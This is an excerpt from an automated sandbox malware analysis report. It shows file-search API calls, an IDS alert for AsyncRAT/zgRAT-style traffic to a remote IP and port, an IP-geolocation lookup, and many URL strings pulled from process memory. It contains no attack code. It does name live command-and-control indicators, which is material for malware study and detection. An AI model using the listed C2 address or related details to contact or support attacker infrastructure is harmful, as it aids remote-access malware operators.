        Source: C:\Windows\System32\svchost.exeCode function: 22_2_000001590E6BF264 FindFirstFileExW,22_2_000001590E6BF264
        Source: C:\Windows\System32\svchost.exeCode function: 22_2_000001590E6BF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,22_2_000001590E6BF3E8
        Source: C:\Windows\System32\svchost.exeCode function: 23_2_0000021C29A6F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,23_2_0000021C29A6F3E8
        Source: C:\Windows\System32\svchost.exeCode function: 23_2_0000021C29A6F264 FindFirstFileExW,23_2_0000021C29A6F264
        Source: C:\Windows\System32\svchost.exeCode function: 24_2_00000276D72CF264 FindFirstFileExW,24_2_00000276D72CF264
        Source: C:\Windows\System32\svchost.exeCode function: 24_2_00000276D72CF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,24_2_00000276D72CF3E8
        Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000021D846CF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,25_2_0000021D846CF3E8
        Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000021D846CF264 FindFirstFileExW,25_2_0000021D846CF264
        Source: C:\Windows\System32\svchost.exeCode function: 26_2_0000025BFDA9F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,26_2_0000025BFDA9F3E8
        Source: C:\Windows\System32\svchost.exeCode function: 26_2_0000025BFDA9F264 FindFirstFileExW,26_2_0000025BFDA9F264
        Source: C:\Windows\System32\svchost.exeCode function: 27_2_000001691456F264 FindFirstFileExW,27_2_000001691456F264
        Source: C:\Windows\System32\svchost.exeCode function: 27_2_000001691456F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,27_2_000001691456F3E8

        Networking

        barindex
        Suricata IDS alerts for network traffic
        Source: Network trafficSuricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT/zgRAT Style SSL Cert : 45.94.31.176:4782 -> 192.168.2.5:49713
        Source: global trafficTCP traffic: 192.168.2.5:49713 -> 45.94.31.176:4782
        Source: Joe Sandbox ViewIP Address: 2.16.164.49 2.16.164.49
        Source: Joe Sandbox ViewIP Address: 195.201.57.90 195.201.57.90
        Source: Joe Sandbox ViewIP Address: 195.201.57.90 195.201.57.90
        Source: Joe Sandbox ViewASN Name: GBTCLOUDUS GBTCLOUDUS
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: unknownDNS query: name: ipwho.is
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: ipwho.isConnection: Keep-Alive
        Source: unknownTCP traffic detected without corresponding DNS query: 45.94.31.176
        Source: unknownTCP traffic detected without corresponding DNS query: 45.94.31.176
        Source: unknownTCP traffic detected without corresponding DNS query: 45.94.31.176
        Source: unknownTCP traffic detected without corresponding DNS query: 45.94.31.176
        Source: unknownTCP traffic detected without corresponding DNS query: 45.94.31.176
        Source: unknownTCP traffic detected without corresponding DNS query: 45.94.31.176
        Source: unknownTCP traffic detected without corresponding DNS query: 45.94.31.176
        Source: unknownTCP traffic detected without corresponding DNS query: 45.94.31.176
        Source: unknownTCP traffic detected without corresponding DNS query: 45.94.31.176
        Source: unknownTCP traffic detected without corresponding DNS query: 45.94.31.176
        Source: unknownTCP traffic detected without corresponding DNS query: 45.94.31.176
        Source: unknownTCP traffic detected without corresponding DNS query: 45.94.31.176
        Source: unknownTCP traffic detected without corresponding DNS query: 45.94.31.176
        Source: unknownTCP traffic detected without corresponding DNS query: 45.94.31.176
        Source: unknownTCP traffic detected without corresponding DNS query: 45.94.31.176
        Source: unknownTCP traffic detected without corresponding DNS query: 45.94.31.176
        Source: unknownTCP traffic detected without corresponding DNS query: 142.250.181.227
        Source: unknownTCP traffic detected without corresponding DNS query: 2.16.164.49
        Source: unknownTCP traffic detected without corresponding DNS query: 2.16.164.49
        Source: unknownTCP traffic detected without corresponding DNS query: 142.250.181.227
        Source: unknownTCP traffic detected without corresponding DNS query: 2.16.164.49
        Source: unknownTCP traffic detected without corresponding DNS query: 2.16.164.49
        Source: unknownTCP traffic detected without corresponding DNS query: 45.94.31.176
        Source: unknownTCP traffic detected without corresponding DNS query: 45.94.31.176
        Source: unknownTCP traffic detected without corresponding DNS query: 45.94.31.176
        Source: unknownTCP traffic detected without corresponding DNS query: 2.16.164.49
        Source: unknownTCP traffic detected without corresponding DNS query: 2.16.164.49
        Source: unknownTCP traffic detected without corresponding DNS query: 2.16.164.49
        Source: unknownTCP traffic detected without corresponding DNS query: 2.16.164.49
        Source: unknownTCP traffic detected without corresponding DNS query: 2.16.164.49
        Source: unknownTCP traffic detected without corresponding DNS query: 2.16.164.49
        Source: unknownTCP traffic detected without corresponding DNS query: 2.16.164.49
        Source: unknownTCP traffic detected without corresponding DNS query: 2.16.164.49
        Source: unknownTCP traffic detected without corresponding DNS query: 45.94.31.176
        Source: unknownTCP traffic detected without corresponding DNS query: 45.94.31.176
        Source: unknownTCP traffic detected without corresponding DNS query: 45.94.31.176
        Source: unknownTCP traffic detected without corresponding DNS query: 45.94.31.176
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: ipwho.isConnection: Keep-Alive
        Source: global trafficDNS traffic detected: DNS query: ipwho.is
        Source: lsass.exe, 0000000E.00000000.1576512802.0000019AB844E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1579164806.0000019AB8DE0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2748590319.0000019AB8C46000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1578526960.0000019AB8C46000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2731503287.0000019AB844E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1576447418.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2776918528.0000019AB8DE0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2729868190.0000019AB842F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
        Source: lsass.exe, 0000000E.00000000.1577030626.0000019AB8489000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2733492664.0000019AB846F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1579067495.0000019AB8DCF000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2774064217.0000019AB8DCF000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1578969138.0000019AB8D83000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2735352658.0000019AB8489000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1576550853.0000019AB846F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2768342256.0000019AB8D83000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
        Source: lsass.exe, 0000000E.00000000.1579164806.0000019AB8DE0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1578969138.0000019AB8D83000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2776918528.0000019AB8DE0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2768342256.0000019AB8D83000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
        Source: lsass.exe, 0000000E.00000000.1579067495.0000019AB8DCF000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1576512802.0000019AB844E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2774064217.0000019AB8DCF000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1579164806.0000019AB8DE0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2748590319.0000019AB8C46000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1578526960.0000019AB8C46000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2731503287.0000019AB844E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1576447418.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2776918528.0000019AB8DE0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2729868190.0000019AB842F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
        Source: lsass.exe, 0000000E.00000000.1576512802.0000019AB844E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1579164806.0000019AB8DE0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2748590319.0000019AB8C46000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1578526960.0000019AB8C46000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2731503287.0000019AB844E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1576447418.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2776918528.0000019AB8DE0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2729868190.0000019AB842F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
        Source: lsass.exe, 0000000E.00000000.1577030626.0000019AB8489000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2733492664.0000019AB846F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1579067495.0000019AB8DCF000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2774064217.0000019AB8DCF000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1578969138.0000019AB8D83000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2735352658.0000019AB8489000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1576550853.0000019AB846F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2768342256.0000019AB8D83000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
        Source: lsass.exe, 0000000E.00000000.1579164806.0000019AB8DE0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1578969138.0000019AB8D83000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2776918528.0000019AB8DE0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2768342256.0000019AB8D83000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
        Source: lsass.exe, 0000000E.00000000.1579067495.0000019AB8DCF000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1576512802.0000019AB844E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2774064217.0000019AB8DCF000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1579164806.0000019AB8DE0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2748590319.0000019AB8C46000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1578526960.0000019AB8C46000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2731503287.0000019AB844E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1576447418.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2776918528.0000019AB8DE0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2729868190.0000019AB842F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
        Source: lsass.exe, 0000000E.00000000.1576512802.0000019AB844E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1579164806.0000019AB8DE0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2748590319.0000019AB8C46000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1578526960.0000019AB8C46000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2731503287.0000019AB844E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1576447418.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2776918528.0000019AB8DE0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2729868190.0000019AB842F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
        Source: lsass.exe, 0000000E.00000000.1579067495.0000019AB8DCF000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1576512802.0000019AB844E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2774064217.0000019AB8DCF000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1579164806.0000019AB8DE0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2748590319.0000019AB8C46000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1578526960.0000019AB8C46000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2731503287.0000019AB844E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1576447418.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2776918528.0000019AB8DE0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2729868190.0000019AB842F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
        Source: lsass.exe, 0000000E.00000000.1578750595.0000019AB8C75000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2757045259.0000019AB8C75000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
        Source: powershell.exe, 00000008.00000002.2736820905.0000020D05C42000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2748590319.0000019AB8C00000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1578526960.0000019AB8C00000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
        Source: lsass.exe, 0000000E.00000000.1576447418.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2729868190.0000019AB842F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
        Source: lsass.exe, 0000000E.00000000.1576512802.0000019AB844E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2731503287.0000019AB844E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
        Source: lsass.exe, 0000000E.00000000.1576447418.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2729868190.0000019AB842F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
        Source: svchost.exe, 00000018.00000000.1651233793.00000276D6FD0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2766065494.00000276D6FD0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID
        Source: powershell.exe, 00000005.00000002.1436384830.0000027136ECB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://microsoft.corosoft%20Time-Stamp%20PCA%202010(1).crl0
        Source: powershell.exe, 00000005.00000002.1416391663.00000271202BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1432406591.000002712EAA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1432406591.000002712E966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: lsass.exe, 0000000E.00000000.1577030626.0000019AB8489000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2733492664.0000019AB846F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1579067495.0000019AB8DCF000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1576512802.0000019AB844E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2774064217.0000019AB8DCF000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1579164806.0000019AB8DE0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2748590319.0000019AB8C46000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1578526960.0000019AB8C46000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1578969138.0000019AB8D83000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2731503287.0000019AB844E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2735352658.0000019AB8489000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1576447418.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2776918528.0000019AB8DE0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1576550853.0000019AB846F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2768342256.0000019AB8D83000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2729868190.0000019AB842F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
        Source: lsass.exe, 0000000E.00000000.1579067495.0000019AB8DCF000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1576512802.0000019AB844E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2774064217.0000019AB8DCF000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1579164806.0000019AB8DE0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2748590319.0000019AB8C46000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1578526960.0000019AB8C46000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2731503287.0000019AB844E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1576447418.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2776918528.0000019AB8DE0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2729868190.0000019AB842F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0H
        Source: powershell.exe, 00000008.00000002.2808227707.0000020D08152000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: svchost.exe, 00000017.00000002.2721583993.0000021C28BE0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
        Source: lsass.exe, 0000000E.00000000.1576447418.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2729868190.0000019AB842F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
        Source: lsass.exe, 0000000E.00000000.1576447418.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2729868190.0000019AB842F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
        Source: powershell.exe, 00000005.00000002.1416391663.000002711E8F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2808227707.0000020D07E81000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: lsass.exe, 0000000E.00000000.1576512802.0000019AB844E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2731503287.0000019AB844E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1576447418.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2729868190.0000019AB842F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
        Source: lsass.exe, 0000000E.00000000.1576447418.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2729868190.0000019AB842F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
        Source: lsass.exe, 0000000E.00000000.1576447418.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2729868190.0000019AB842F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
        Source: lsass.exe, 0000000E.00000000.1576447418.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2729868190.0000019AB842F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
        Source: powershell.exe, 00000008.00000002.2808227707.0000020D08152000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: lsass.exe, 0000000E.00000000.1579067495.0000019AB8DCF000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1576512802.0000019AB844E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2774064217.0000019AB8DCF000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1579164806.0000019AB8DE0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2748590319.0000019AB8C46000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1578526960.0000019AB8C46000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2731503287.0000019AB844E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1576447418.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2776918528.0000019AB8DE0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2729868190.0000019AB842F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
        Source: svchost.exe, 0000001F.00000002.2840702182.0000027714483000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000000.1684984868.0000027714483000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.msftconnecttest.com
        Source: svchost.exe, 0000001F.00000002.2840702182.0000027714483000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000000.1684984868.0000027714483000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.msftconnecttest.com/
        Source: powershell.exe, 00000008.00000002.2808227707.0000020D07E81000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
        Source: powershell.exe, 00000005.00000002.1416391663.000002711E8F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2808227707.0000020D07E81000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 00000008.00000002.2808227707.0000020D07E81000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6xGX%
        Source: powershell.exe, 00000005.00000002.1432406591.000002712E966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000005.00000002.1432406591.000002712E966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000005.00000002.1432406591.000002712E966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: svchost.exe, 00000029.00000002.2816272726.000002565B218000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000003.2001193978.000002565AD9B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000000.1728303755.000002565AD9B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000002.2793878629.000002565AD9B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.comSRD1%
        Source: svchost.exe, 00000018.00000000.1656594821.00000276D7EBA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.1779407636.00000276D7EBA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.1787154224.00000276D7EBA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod
        Source: svchost.exe, 00000018.00000000.1656594821.00000276D7EBA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.1779407636.00000276D7EBA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.1787154224.00000276D7EBA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdC:
        Source: svchost.exe, 00000018.00000000.1656594821.00000276D7EBA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.1779407636.00000276D7EBA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.1787154224.00000276D7EBA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2C:
        Source: svchost.exe, 00000018.00000000.1656594821.00000276D7EBA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.1779407636.00000276D7EBA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.1787154224.00000276D7EBA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2f%
        Source: powershell.exe, 00000008.00000002.2808227707.0000020D08152000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000005.00000002.1416391663.000002711FDA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
        Source: powershell.exe, 00000005.00000002.1416391663.00000271202BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1432406591.000002712EAA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1432406591.000002712E966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: svchost.exe, 00000029.00000000.1728791897.000002565AE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
        Source: svchost.exe, 00000029.00000000.1732975390.000002565B56D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000003.2001193978.000002565AD9B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000003.2002771455.000002565B56E000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000000.1731740290.000002565B3AD000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000000.1728303755.000002565AD9B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000002.2834498317.000002565B4EB000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000002.2793878629.000002565AD9B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.comSRD1-
        Source: svchost.exe, 00000029.00000000.1732975390.000002565B56D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000003.2002771455.000002565B56E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comSRD13
        Source: svchost.exe, 00000018.00000003.1776467589.00000276D7C1E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns2-am3p.notify.windows.com/?token=AwYAAAAVHcznLkp9fcrV9Clhd2HepVc2%2fAlS973crXBsYmvJM5lgXx
